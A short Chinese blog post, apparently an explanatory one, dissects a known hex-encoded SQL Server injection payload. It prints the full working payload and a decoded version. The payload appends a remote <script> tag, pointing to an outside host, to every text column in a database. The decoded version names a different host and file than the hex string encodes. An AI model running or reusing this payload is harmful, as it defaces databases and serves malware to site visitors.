• 16进制 SQL注入


    dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72 eXeC(@s);

    这个就是互联网泛滥的挂马专用代码,专门给过滤法的程序服务的。

    把16进制翻译过来
    DECLARE @T VARCHAR(255),@C VARCHAR(255)
    DECLARE Table_Cursor CURSOR FOR
    SELECT a.name,b.name FROM sysobjects a,syscolumns b
    WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C END
    CLOSE Table_Cursor DEALLOCATE Table_Cursor

    看来原来的代码给16进制掩护得多少好。
  • 相关阅读:
    spring boot @value 使用
    mac Navicat premium 链接oracle
    List sort 排序
    mac 配置jdk+maven环境变量
    mybatis 根据主键批量insert或update
    git 常用命令
    SpringBoot整合Activiti案例
    Activiti网关-并行网关
    Activiti网关-包含网关
    Activiti网关-排他网关
  • 原文地址:https://www.cnblogs.com/zzxap/p/2175782.html
Copyright © 2020-2023  润新知